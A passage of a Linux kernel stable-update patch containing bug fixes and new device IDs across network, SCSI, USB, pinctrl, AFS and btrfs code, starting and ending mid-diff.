+@@ -492,6 +495,20 @@ static int ax88179_resume(struct usb_interface *intf)
+ 	return usbnet_resume(intf);
+ }
+ 
++static void ax88179_disconnect(struct usb_interface *intf)
++{
++	struct usbnet *dev = usb_get_intfdata(intf);
++	struct ax88179_data *ax179_data;
++
++	if (!dev)
++		return;
++
++	ax179_data = dev->driver_priv;
++	ax179_data->disconnecting = 1;
++
++	usbnet_disconnect(intf);
++}
++
+ static void
+ ax88179_get_wol(struct net_device *net, struct ethtool_wolinfo *wolinfo)
+ {
+@@ -1906,7 +1923,7 @@ static struct usb_driver ax88179_178a_driver = {
+ 	.suspend =	ax88179_suspend,
+ 	.resume =	ax88179_resume,
+ 	.reset_resume =	ax88179_resume,
+-	.disconnect =	usbnet_disconnect,
++	.disconnect =	ax88179_disconnect,
+ 	.supports_autosuspend = 1,
+ 	.disable_hub_initiated_lpm = 1,
+ };
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+index 39ab6526e6b85..796972f224326 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+@@ -3034,7 +3034,7 @@ static u32 iwl_trans_pcie_dump_rbs(struct iwl_trans *trans,
+ 	struct iwl_rxq *rxq = &trans_pcie->rxq[0];
+ 	u32 i, r, j, rb_len = 0;
+ 
+-	spin_lock(&rxq->lock);
++	spin_lock_bh(&rxq->lock);
+ 
+ 	r = le16_to_cpu(iwl_get_closed_rb_stts(trans, rxq)) & 0x0FFF;
+ 
+@@ -3058,7 +3058,7 @@ static u32 iwl_trans_pcie_dump_rbs(struct iwl_trans *trans,
+ 		*data = iwl_fw_error_next_data(*data);
+ 	}
+ 
+-	spin_unlock(&rxq->lock);
++	spin_unlock_bh(&rxq->lock);
+ 
+ 	return rb_len;
+ }
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index eb7c87b344b8f..5b906dbb1096c 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -4835,6 +4835,8 @@ static void nvme_fw_act_work(struct work_struct *work)
+ 				struct nvme_ctrl, fw_act_work);
+ 	unsigned long fw_act_timeout;
+ 
++	nvme_auth_stop(ctrl);
++
+ 	if (ctrl->mtfa)
+ 		fw_act_timeout = jiffies +
+ 				msecs_to_jiffies(ctrl->mtfa * 100);
+@@ -4890,7 +4892,6 @@ static bool nvme_handle_aen_notice(struct nvme_ctrl *ctrl, u32 result)
+ 		 * firmware activation.
+ 		 */
+ 		if (nvme_change_ctrl_state(ctrl, NVME_CTRL_RESETTING)) {
+-			nvme_auth_stop(ctrl);
+ 			requeue = false;
+ 			queue_work(nvme_wq, &ctrl->fw_act_work);
+ 		}
+diff --git a/drivers/pinctrl/pinctrl-at91-pio4.c b/drivers/pinctrl/pinctrl-at91-pio4.c
+index f71c6457e3509..2425d4813c3c5 100644
+--- a/drivers/pinctrl/pinctrl-at91-pio4.c
++++ b/drivers/pinctrl/pinctrl-at91-pio4.c
+@@ -1033,6 +1033,13 @@ static const struct of_device_id atmel_pctrl_of_match[] = {
+ 	}
+ };
+ 
++/*
++ * This lock class allows to tell lockdep that parent IRQ and children IRQ do
++ * not share the same class so it does not raise false positive
++ */
++static struct lock_class_key atmel_lock_key;
++static struct lock_class_key atmel_request_key;
++
+ static int atmel_pinctrl_probe(struct platform_device *pdev)
+ {
+ 	struct device *dev = &pdev->dev;
+@@ -1185,6 +1192,7 @@ static int atmel_pinctrl_probe(struct platform_device *pdev)
+ 		irq_set_chip_and_handler(irq, &atmel_gpio_irq_chip,
+ 					 handle_simple_irq);
+ 		irq_set_chip_data(irq, atmel_pioctrl);
++		irq_set_lockdep_class(irq, &atmel_lock_key, &atmel_request_key);
+ 		dev_dbg(dev,
+ 			"atmel gpio irq domain: hwirq: %d, linux irq: %d\n",
+ 			i, irq);
+diff --git a/drivers/pinctrl/starfive/pinctrl-starfive-jh7100.c b/drivers/pinctrl/starfive/pinctrl-starfive-jh7100.c
+index 5b544fb7f3d88..3b18a03075f46 100644
+--- a/drivers/pinctrl/starfive/pinctrl-starfive-jh7100.c
++++ b/drivers/pinctrl/starfive/pinctrl-starfive-jh7100.c
+@@ -489,7 +489,7 @@ static int starfive_dt_node_to_map(struct pinctrl_dev *pctldev,
+ 
+ 	nmaps = 0;
+ 	ngroups = 0;
+-	for_each_child_of_node(np, child) {
++	for_each_available_child_of_node(np, child) {
+ 		int npinmux = of_property_count_u32_elems(child, "pinmux");
+ 		int npins   = of_property_count_u32_elems(child, "pins");
+ 
+@@ -524,7 +524,7 @@ static int starfive_dt_node_to_map(struct pinctrl_dev *pctldev,
+ 	nmaps = 0;
+ 	ngroups = 0;
+ 	mutex_lock(&sfp->mutex);
+-	for_each_child_of_node(np, child) {
++	for_each_available_child_of_node(np, child) {
+ 		int npins;
+ 		int i;
+ 
+diff --git a/drivers/reset/core.c b/drivers/reset/core.c
+index f0a076e94118f..92cc13ef3e566 100644
+--- a/drivers/reset/core.c
++++ b/drivers/reset/core.c
+@@ -807,6 +807,9 @@ static void __reset_control_put_internal(struct reset_control *rstc)
+ {
+ 	lockdep_assert_held(&reset_list_mutex);
+ 
++	if (IS_ERR_OR_NULL(rstc))
++		return;
++
+ 	kref_put(&rstc->refcnt, __reset_control_release);
+ }
+ 
+@@ -1017,11 +1020,8 @@ EXPORT_SYMBOL_GPL(reset_control_put);
+ void reset_control_bulk_put(int num_rstcs, struct reset_control_bulk_data *rstcs)
+ {
+ 	mutex_lock(&reset_list_mutex);
+-	while (num_rstcs--) {
+-		if (IS_ERR_OR_NULL(rstcs[num_rstcs].rstc))
+-			continue;
++	while (num_rstcs--)
+ 		__reset_control_put_internal(rstcs[num_rstcs].rstc);
+-	}
+ 	mutex_unlock(&reset_list_mutex);
+ }
+ EXPORT_SYMBOL_GPL(reset_control_bulk_put);
+diff --git a/drivers/scsi/aacraid/aacraid.h b/drivers/scsi/aacraid/aacraid.h
+index 7c6efde75da66..5e115e8b2ba46 100644
+--- a/drivers/scsi/aacraid/aacraid.h
++++ b/drivers/scsi/aacraid/aacraid.h
+@@ -1678,7 +1678,6 @@ struct aac_dev
+ 	u32			handle_pci_error;
+ 	bool			init_reset;
+ 	u8			soft_reset_support;
+-	u8			use_map_queue;
+ };
+ 
+ #define aac_adapter_interrupt(dev) \
+diff --git a/drivers/scsi/aacraid/commsup.c b/drivers/scsi/aacraid/commsup.c
+index 013a9a334972e..25cee03d7f973 100644
+--- a/drivers/scsi/aacraid/commsup.c
++++ b/drivers/scsi/aacraid/commsup.c
+@@ -223,12 +223,8 @@ int aac_fib_setup(struct aac_dev * dev)
+ struct fib *aac_fib_alloc_tag(struct aac_dev *dev, struct scsi_cmnd *scmd)
+ {
+ 	struct fib *fibptr;
+-	u32 blk_tag;
+-	int i;
+ 
+-	blk_tag = blk_mq_unique_tag(scsi_cmd_to_rq(scmd));
+-	i = blk_mq_unique_tag_to_tag(blk_tag);
+-	fibptr = &dev->fibs[i];
++	fibptr = &dev->fibs[scsi_cmd_to_rq(scmd)->tag];
+ 	/*
+ 	 *	Null out fields that depend on being zero at the start of
+ 	 *	each I/O
+diff --git a/drivers/scsi/aacraid/linit.c b/drivers/scsi/aacraid/linit.c
+index bff49b8ab057d..5ba5c18b77b46 100644
+--- a/drivers/scsi/aacraid/linit.c
++++ b/drivers/scsi/aacraid/linit.c
+@@ -19,7 +19,6 @@
+ 
+ #include <linux/compat.h>
+ #include <linux/blkdev.h>
+-#include <linux/blk-mq-pci.h>
+ #include <linux/completion.h>
+ #include <linux/init.h>
+ #include <linux/interrupt.h>
+@@ -506,15 +505,6 @@ common_config:
+ 	return 0;
+ }
+ 
+-static void aac_map_queues(struct Scsi_Host *shost)
+-{
+-	struct aac_dev *aac = (struct aac_dev *)shost->hostdata;
+-
+-	blk_mq_pci_map_queues(&shost->tag_set.map[HCTX_TYPE_DEFAULT],
+-			      aac->pdev, 0);
+-	aac->use_map_queue = true;
+-}
+-
+ /**
+  *	aac_change_queue_depth		-	alter queue depths
+  *	@sdev:	SCSI device we are considering
+@@ -1499,7 +1489,6 @@ static struct scsi_host_template aac_driver_template = {
+ 	.bios_param			= aac_biosparm,
+ 	.shost_groups			= aac_host_groups,
+ 	.slave_configure		= aac_slave_configure,
+-	.map_queues			= aac_map_queues,
+ 	.change_queue_depth		= aac_change_queue_depth,
+ 	.sdev_groups			= aac_dev_groups,
+ 	.eh_abort_handler		= aac_eh_abort,
+@@ -1787,8 +1776,6 @@ static int aac_probe_one(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	shost->max_lun = AAC_MAX_LUN;
+ 
+ 	pci_set_drvdata(pdev, shost);
+-	shost->nr_hw_queues = aac->max_msix;
+-	shost->host_tagset = 1;
+ 
+ 	error = scsi_add_host(shost, &pdev->dev);
+ 	if (error)
+@@ -1921,7 +1908,6 @@ static void aac_remove_one(struct pci_dev *pdev)
+ 	struct aac_dev *aac = (struct aac_dev *)shost->hostdata;
+ 
+ 	aac_cancel_rescan_worker(aac);
+-	aac->use_map_queue = false;
+ 	scsi_remove_host(shost);
+ 
+ 	__aac_shutdown(aac);
+diff --git a/drivers/scsi/aacraid/src.c b/drivers/scsi/aacraid/src.c
+index 61949f3741886..11ef58204e96f 100644
+--- a/drivers/scsi/aacraid/src.c
++++ b/drivers/scsi/aacraid/src.c
+@@ -493,10 +493,6 @@ static int aac_src_deliver_message(struct fib *fib)
+ #endif
+ 
+ 	u16 vector_no;
+-	struct scsi_cmnd *scmd;
+-	u32 blk_tag;
+-	struct Scsi_Host *shost = dev->scsi_host_ptr;
+-	struct blk_mq_queue_map *qmap;
+ 
+ 	atomic_inc(&q->numpending);
+ 
+@@ -509,25 +505,8 @@ static int aac_src_deliver_message(struct fib *fib)
+ 		if ((dev->comm_interface == AAC_COMM_MESSAGE_TYPE3)
+ 			&& dev->sa_firmware)
+ 			vector_no = aac_get_vector(dev);
+-		else {
+-			if (!fib->vector_no || !fib->callback_data) {
+-				if (shost && dev->use_map_queue) {
+-					qmap = &shost->tag_set.map[HCTX_TYPE_DEFAULT];
+-					vector_no = qmap->mq_map[raw_smp_processor_id()];
+-				}
+-				/*
+-				 *	We hardcode the vector_no for
+-				 *	reserved commands as a valid shost is
+-				 *	absent during the init
+-				 */
+-				else
+-					vector_no = 0;
+-			} else {
+-				scmd = (struct scsi_cmnd *)fib->callback_data;
+-				blk_tag = blk_mq_unique_tag(scsi_cmd_to_rq(scmd));
+-				vector_no = blk_mq_unique_tag_to_hwq(blk_tag);
+-			}
+-		}
++		else
++			vector_no = fib->vector_no;
+ 
+ 		if (native_hba) {
+ 			if (fib->flags & FIB_CONTEXT_FLAG_NATIVE_HBA_TMF) {
+diff --git a/drivers/scsi/bnx2fc/bnx2fc_fcoe.c b/drivers/scsi/bnx2fc/bnx2fc_fcoe.c
+index 05ddbb9bb7d8a..451a58e0fd969 100644
+--- a/drivers/scsi/bnx2fc/bnx2fc_fcoe.c
++++ b/drivers/scsi/bnx2fc/bnx2fc_fcoe.c
+@@ -429,7 +429,6 @@ static int bnx2fc_rcv(struct sk_buff *skb, struct net_device *dev,
+ 	struct fcoe_ctlr *ctlr;
+ 	struct fcoe_rcv_info *fr;
+ 	struct fcoe_percpu_s *bg;
+-	struct sk_buff *tmp_skb;
+ 
+ 	interface = container_of(ptype, struct bnx2fc_interface,
+ 				 fcoe_packet_type);
+@@ -441,11 +440,9 @@ static int bnx2fc_rcv(struct sk_buff *skb, struct net_device *dev,
+ 		goto err;
+ 	}
+ 
+-	tmp_skb = skb_share_check(skb, GFP_ATOMIC);
+-	if (!tmp_skb)
+-		goto err;
+-
+-	skb = tmp_skb;
++	skb = skb_share_check(skb, GFP_ATOMIC);
++	if (!skb)
++		return -1;
+ 
+ 	if (unlikely(eth_hdr(skb)->h_proto != htons(ETH_P_FCOE))) {
+ 		printk(KERN_ERR PFX "bnx2fc_rcv: Wrong FC type frame\n");
+diff --git a/drivers/scsi/scsi_error.c b/drivers/scsi/scsi_error.c
+index 02520f9123066..9a289d6f2e5ee 100644
+--- a/drivers/scsi/scsi_error.c
++++ b/drivers/scsi/scsi_error.c
+@@ -1108,6 +1108,7 @@ retry:
+ 
+ 	scsi_log_send(scmd);
+ 	scmd->submitter = SUBMITTED_BY_SCSI_ERROR_HANDLER;
++	scmd->flags |= SCMD_LAST;
+ 
+ 	/*
+ 	 * Lock sdev->state_mutex to avoid that scsi_device_quiesce() can
+@@ -2402,6 +2403,7 @@ scsi_ioctl_reset(struct scsi_device *dev, int __user *arg)
+ 	scsi_init_command(dev, scmd);
+ 
+ 	scmd->submitter = SUBMITTED_BY_SCSI_RESET_IOCTL;
++	scmd->flags |= SCMD_LAST;
+ 	memset(&scmd->sdb, 0, sizeof(scmd->sdb));
+ 
+ 	scmd->cmd_len			= 0;
+diff --git a/drivers/thunderbolt/debugfs.c b/drivers/thunderbolt/debugfs.c
+index d89f92032c1c2..f691bce5c1477 100644
+--- a/drivers/thunderbolt/debugfs.c
++++ b/drivers/thunderbolt/debugfs.c
+@@ -943,7 +943,7 @@ static void margining_port_remove(struct tb_port *port)
+ 	snprintf(dir_name, sizeof(dir_name), "port%d", port->port);
+ 	parent = debugfs_lookup(dir_name, port->sw->debugfs_dir);
+ 	if (parent)
+-		debugfs_remove_recursive(debugfs_lookup("margining", parent));
++		debugfs_lookup_and_remove("margining", parent);
+ 
+ 	kfree(port->usb4->margining);
+ 	port->usb4->margining = NULL;
+diff --git a/drivers/usb/serial/ftdi_sio.c b/drivers/usb/serial/ftdi_sio.c
+index 05e28a5ce42b1..fe2173e37b061 100644
+--- a/drivers/usb/serial/ftdi_sio.c
++++ b/drivers/usb/serial/ftdi_sio.c
+@@ -1033,9 +1033,9 @@ static const struct usb_device_id id_table_combined[] = {
+ 	{ USB_DEVICE(FTDI_VID, ACTISENSE_USG_PID) },
+ 	{ USB_DEVICE(FTDI_VID, ACTISENSE_NGT_PID) },
+ 	{ USB_DEVICE(FTDI_VID, ACTISENSE_NGW_PID) },
+-	{ USB_DEVICE(FTDI_VID, ACTISENSE_D9AC_PID) },
+-	{ USB_DEVICE(FTDI_VID, ACTISENSE_D9AD_PID) },
+-	{ USB_DEVICE(FTDI_VID, ACTISENSE_D9AE_PID) },
++	{ USB_DEVICE(FTDI_VID, ACTISENSE_UID_PID) },
++	{ USB_DEVICE(FTDI_VID, ACTISENSE_USA_PID) },
++	{ USB_DEVICE(FTDI_VID, ACTISENSE_NGX_PID) },
+ 	{ USB_DEVICE(FTDI_VID, ACTISENSE_D9AF_PID) },
+ 	{ USB_DEVICE(FTDI_VID, CHETCO_SEAGAUGE_PID) },
+ 	{ USB_DEVICE(FTDI_VID, CHETCO_SEASWITCH_PID) },
+diff --git a/drivers/usb/serial/ftdi_sio_ids.h b/drivers/usb/serial/ftdi_sio_ids.h
+index e2099445db708..21a2b5a25fc09 100644
+--- a/drivers/usb/serial/ftdi_sio_ids.h
++++ b/drivers/usb/serial/ftdi_sio_ids.h
+@@ -1568,9 +1568,9 @@
+ #define ACTISENSE_USG_PID		0xD9A9 /* USG USB Serial Adapter */
+ #define ACTISENSE_NGT_PID		0xD9AA /* NGT NMEA2000 Interface */
+ #define ACTISENSE_NGW_PID		0xD9AB /* NGW NMEA2000 Gateway */
+-#define ACTISENSE_D9AC_PID		0xD9AC /* Actisense Reserved */
+-#define ACTISENSE_D9AD_PID		0xD9AD /* Actisense Reserved */
+-#define ACTISENSE_D9AE_PID		0xD9AE /* Actisense Reserved */
++#define ACTISENSE_UID_PID		0xD9AC /* USB Isolating Device */
++#define ACTISENSE_USA_PID		0xD9AD /* USB to Serial Adapter */
++#define ACTISENSE_NGX_PID		0xD9AE /* NGX NMEA2000 Gateway */
+ #define ACTISENSE_D9AF_PID		0xD9AF /* Actisense Reserved */
+ #define CHETCO_SEAGAUGE_PID		0xA548 /* SeaGauge USB Adapter */
+ #define CHETCO_SEASWITCH_PID		0xA549 /* SeaSwitch USB Adapter */
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index 7f2aa72d52e65..4adef92598709 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -272,6 +272,7 @@ static void option_instat_callback(struct urb *urb);
+ #define QUECTEL_PRODUCT_RM500Q			0x0800
+ #define QUECTEL_PRODUCT_RM520N			0x0801
+ #define QUECTEL_PRODUCT_EC200U			0x0901
++#define QUECTEL_PRODUCT_EG912Y			0x6001
+ #define QUECTEL_PRODUCT_EC200S_CN		0x6002
+ #define QUECTEL_PRODUCT_EC200A			0x6005
+ #define QUECTEL_PRODUCT_EM061K_LWW		0x6008
+@@ -1232,6 +1233,7 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, 0x0700, 0xff), /* BG95 */
+ 	  .driver_info = RSVD(3) | ZLP },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM500Q, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM500Q, 0xff, 0, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM500Q, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM500Q, 0xff, 0xff, 0x10),
+ 	  .driver_info = ZLP },
+@@ -1244,6 +1246,7 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200U, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200S_CN, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EC200T, 0xff, 0, 0) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EG912Y, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_RM500K, 0xff, 0x00, 0x00) },
+ 
+ 	{ USB_DEVICE(CMOTECH_VENDOR_ID, CMOTECH_PRODUCT_6001) },
+@@ -2242,6 +2245,8 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = RSVD(0) | RSVD(1) | RSVD(6) },
+ 	{ USB_DEVICE(0x0489, 0xe0b5),						/* Foxconn T77W968 ESIM */
+ 	  .driver_info = RSVD(0) | RSVD(1) | RSVD(6) },
++	{ USB_DEVICE_INTERFACE_CLASS(0x0489, 0xe0da, 0xff),                     /* Foxconn T99W265 MBIM variant */
++	  .driver_info = RSVD(3) | RSVD(5) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x0489, 0xe0db, 0xff),			/* Foxconn T99W265 MBIM */
+ 	  .driver_info = RSVD(3) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x0489, 0xe0ee, 0xff),			/* Foxconn T99W368 MBIM */
+diff --git a/drivers/usb/storage/unusual_devs.h b/drivers/usb/storage/unusual_devs.h
+index 20dcbccb290b3..fd68204374f2c 100644
+--- a/drivers/usb/storage/unusual_devs.h
++++ b/drivers/usb/storage/unusual_devs.h
+@@ -1305,6 +1305,17 @@ UNUSUAL_DEV(  0x090c, 0x6000, 0x0100, 0x0100,
+ 		USB_SC_DEVICE, USB_PR_DEVICE, NULL,
+ 		US_FL_INITIAL_READ10 ),
+ 
++/*
++ * Patch by Tasos Sahanidis <tasos@tasossah.com>
++ * This flash drive always shows up with write protect enabled
++ * during the first mode sense.
++ */
++UNUSUAL_DEV(0x0951, 0x1697, 0x0100, 0x0100,
++		"Kingston",
++		"DT Ultimate G3",
++		USB_SC_DEVICE, USB_PR_DEVICE, NULL,
++		US_FL_NO_WP_DETECT),
++
+ /*
+  * This Pentax still camera is not conformant
+  * to the USB storage specification: -
+diff --git a/fs/afs/cell.c b/fs/afs/cell.c
+index 988c2ac7cecec..926cb1188eba6 100644
+--- a/fs/afs/cell.c
++++ b/fs/afs/cell.c
+@@ -409,10 +409,12 @@ static int afs_update_cell(struct afs_cell *cell)
+ 		if (ret == -ENOMEM)
+ 			goto out_wake;
+ 
+-		ret = -ENOMEM;
+ 		vllist = afs_alloc_vlserver_list(0);
+-		if (!vllist)
++		if (!vllist) {
++			if (ret >= 0)
++				ret = -ENOMEM;
+ 			goto out_wake;
++		}
+ 
+ 		switch (ret) {
+ 		case -ENODATA:
+diff --git a/fs/afs/dynroot.c b/fs/afs/dynroot.c
+index 91e804c70dd0a..9937993cf29dc 100644
+--- a/fs/afs/dynroot.c
++++ b/fs/afs/dynroot.c
+@@ -114,6 +114,7 @@ static int afs_probe_cell_name(struct dentry *dentry)
+ 	struct afs_net *net = afs_d2net(dentry);
+ 	const char *name = dentry->d_name.name;
+ 	size_t len = dentry->d_name.len;
++	char *result = NULL;
+ 	int ret;
+ 
+ 	/* Names prefixed with a dot are R/W mounts. */
+@@ -131,9 +132,22 @@ static int afs_probe_cell_name(struct dentry *dentry)
+ 	}
+ 
+ 	ret = dns_query(net->net, "afsdb", name, len, "srv=1",
+-			NULL, NULL, false);
+-	if (ret == -ENODATA || ret == -ENOKEY)
++			&result, NULL, false);
++	if (ret == -ENODATA || ret == -ENOKEY || ret == 0)
+ 		ret = -ENOENT;
++	if (ret > 0 && ret >= sizeof(struct dns_server_list_v1_header)) {
++		struct dns_server_list_v1_header *v1 = (void *)result;
++
++		if (v1->hdr.zero == 0 &&
++		    v1->hdr.content == DNS_PAYLOAD_IS_SERVER_LIST &&
++		    v1->hdr.version == 1 &&
++		    (v1->status != DNS_LOOKUP_GOOD &&
++		     v1->status != DNS_LOOKUP_GOOD_WITH_BAD))
++			return -ENOENT;
++
++	}
++
++	kfree(result);
+ 	return ret;
+ }
+ 
+@@ -252,20 +266,9 @@ static int afs_dynroot_d_revalidate(struct dentry *dentry, unsigned int flags)
+ 	return 1;
+ }
+ 
+-/*
+- * Allow the VFS to enquire as to whether a dentry should be unhashed (mustn't
+- * sleep)
+- * - called from dput() when d_count is going to 0.
+- * - return 1 to request dentry be unhashed, 0 otherwise
+- */
+-static int afs_dynroot_d_delete(const struct dentry *dentry)
+-{
+-	return d_really_is_positive(dentry);
+-}
+-
+ const struct dentry_operations afs_dynroot_dentry_operations = {
+ 	.d_revalidate	= afs_dynroot_d_revalidate,
+-	.d_delete	= afs_dynroot_d_delete,
++	.d_delete	= always_delete_dentry,
+ 	.d_release	= afs_d_release,
+ 	.d_automount	= afs_d_automount,
+ };
+diff --git a/fs/afs/internal.h b/fs/afs/internal.h
+index c2d70fc1698c0..fcbb598d8c85d 100644
+--- a/fs/afs/internal.h
++++ b/fs/afs/internal.h
+@@ -585,6 +585,7 @@ struct afs_volume {
+ #define AFS_VOLUME_OFFLINE	4	/* - T if volume offline notice given */
+ #define AFS_VOLUME_BUSY		5	/* - T if volume busy notice given */
+ #define AFS_VOLUME_MAYBE_NO_IBULK 6	/* - T if some servers don't have InlineBulkStatus */
++#define AFS_VOLUME_RM_TREE	7	/* - Set if volume removed from cell->volumes */
+ #ifdef CONFIG_AFS_FSCACHE
+ 	struct fscache_volume	*cache;		/* Caching cookie */
+ #endif
+@@ -1517,6 +1518,7 @@ extern struct afs_vlserver_list *afs_extract_vlserver_list(struct afs_cell *,
+ extern struct afs_volume *afs_create_volume(struct afs_fs_context *);
+ extern int afs_activate_volume(struct afs_volume *);
+ extern void afs_deactivate_volume(struct afs_volume *);
++bool afs_try_get_volume(struct afs_volume *volume, enum afs_volume_trace reason);
+ extern struct afs_volume *afs_get_volume(struct afs_volume *, enum afs_volume_trace);
+ extern void afs_put_volume(struct afs_net *, struct afs_volume *, enum afs_volume_trace);
+ extern int afs_check_volume_status(struct afs_volume *, struct afs_operation *);
+diff --git a/fs/afs/volume.c b/fs/afs/volume.c
+index f4937029dcd72..1c9144e3e83ac 100644
+--- a/fs/afs/volume.c
++++ b/fs/afs/volume.c
+@@ -32,8 +32,13 @@ static struct afs_volume *afs_insert_volume_into_cell(struct afs_cell *cell,
+ 		} else if (p->vid > volume->vid) {
+ 			pp = &(*pp)->rb_right;
+ 		} else {
+-			volume = afs_get_volume(p, afs_volume_trace_get_cell_insert);
+-			goto found;
++			if (afs_try_get_volume(p, afs_volume_trace_get_cell_insert)) {
++				volume = p;
++				goto found;
++			}
++
++			set_bit(AFS_VOLUME_RM_TREE, &volume->flags);
++			rb_replace_node_rcu(&p->cell_node, &volume->cell_node, &cell->volumes);
+ 		}
+ 	}
+ 
+@@ -56,7 +61,8 @@ static void afs_remove_volume_from_cell(struct afs_volume *volume)
+ 				 afs_volume_trace_remove);
+ 		write_seqlock(&cell->volume_lock);
+ 		hlist_del_rcu(&volume->proc_link);
+-		rb_erase(&volume->cell_node, &cell->volumes);
++		if (!test_and_set_bit(AFS_VOLUME_RM_TREE, &volume->flags))
++			rb_erase(&volume->cell_node, &cell->volumes);
+ 		write_sequnlock(&cell->volume_lock);
+ 	}
+ }
+@@ -235,6 +241,20 @@ static void afs_destroy_volume(struct afs_net *net, struct afs_volume *volume)
+ 	_leave(" [destroyed]");
+ }
+ 
++/*
++ * Try to get a reference on a volume record.
++ */
++bool afs_try_get_volume(struct afs_volume *volume, enum afs_volume_trace reason)
++{
++	int r;
++
++	if (__refcount_inc_not_zero(&volume->ref, &r)) {
++		trace_afs_volume(volume->vid, r + 1, reason);
++		return true;
++	}
++	return false;
++}
++
+ /*
+  * Get a reference on a volume record.
+  */
+diff --git a/fs/btrfs/free-space-cache.c b/fs/btrfs/free-space-cache.c
+index 4cd8e44cba4c5..b27795e13ff31 100644
+--- a/fs/btrfs/free-space-cache.c
++++ b/fs/btrfs/free-space-cache.c
+@@ -2685,13 +2685,8 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 		bg_reclaim_threshold = READ_ONCE(sinfo->bg_reclaim_threshold);
+ 
+ 	spin_lock(&ctl->tree_lock);
+-	/* Count initial region as zone_unusable until it gets activated. */
+ 	if (!used)
+ 		to_free = size;
+-	else if (initial &&
+-		 test_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &block_group->fs_info->flags) &&
+-		 (block_group->flags & (BTRFS_BLOCK_GROUP_METADATA | BTRFS_BLOCK_GROUP_SYSTEM)))
+-		to_free = 0;
+ 	else if (initial)
+ 		to_free = block_group->zone_capacity;
+ 	else if (offset >= block_group->alloc_offset)
+@@ -2719,8 +2714,7 @@ static int __btrfs_add_free_space_zoned(struct btrfs_block_group *block_group,
+ 	reclaimable_unusable = block_group->zone_unusable -
+ 			       (block_group->length - block_group->zone_capacity);
+ 	/* All the region is now unusable. Mark it as unused and reclaim */
+-	if (block_group->zone_unusable == block_group->length &&
+-	    block_group->alloc_offset) {
++	if (block_group->zone_unusable == block_group->length) {
+ 		btrfs_mark_bg_unused(block_group);
+ 	} else if (bg_reclaim_threshold &&
+ 		   reclaimable_unusable >=
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index 675dbed075d8e..99cb690da9893 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -1574,19 +1574,9 @@ void btrfs_calc_zone_unusable(struct btrfs_block_group *cache)
+ 		return;
+ 
+ 	WARN_ON(cache->bytes_super != 0);
+-
+-	/* Check for block groups never get activated */
+-	if (test_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &cache->fs_info->flags) &&
+-	    cache->flags & (BTRFS_BLOCK_GROUP_METADATA | BTRFS_BLOCK_GROUP_SYSTEM) &&
+-	    !test_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &cache->runtime_flags) &&
+-	    cache->alloc_offset == 0) {
+-		unusable = cache->length;
+-		free = 0;
+-	} else {
+-		unusable = (cache->alloc_offset - cache->used) +
+-			   (cache->length - cache->zone_capacity);
+-		free = cache->zone_capacity - cache->alloc_offset;
+-	}
++	unusable = (cache->alloc_offset - cache->used) +
++		   (cache->length - cache->zone_capacity);
++	free = cache->zone_capacity - cache->alloc_offset;
+ 
+ 	/* We only need ->free_space in ALLOC_SEQ block groups */
+ 	cache->cached = BTRFS_CACHE_FINISHED;
+@@ -1882,7 +1872,6 @@ struct btrfs_device *btrfs_zoned_get_device(struct btrfs_fs_info *fs_info,
+ bool btrfs_zone_activate(struct btrfs_block_group *block_group)
+ {
+ 	struct btrfs_fs_info *fs_info = block_group->fs_info;
+-	struct btrfs_space_info *space_info = block_group->space_info;
+ 	struct map_lookup *map;
+ 	struct btrfs_device *device;
+ 	u64 physical;
+@@ -1894,7 +1883,6 @@ bool btrfs_zone_activate(struct btrfs_block_group *block_group)
+ 
+ 	map = block_group->physical_map;
+ 
+-	spin_lock(&space_info->lock);
+ 	spin_lock(&block_group->lock);
+ 	if (test_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &block_group->runtime_flags)) {
+ 		ret = true;
+@@ -1923,14 +1911,7 @@ bool btrfs_zone_activate(struct btrfs_block_group *block_group)
+ 
+ 	/* Successfully activated all the zones */
+ 	set_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &block_group->runtime_flags);
+-	WARN_ON(block_group->alloc_offset != 0);
+-	if (block_group->zone_unusable == block_group->length) {
+-		block_group->zone_unusable = block_group->length - block_group->zone_capacity;
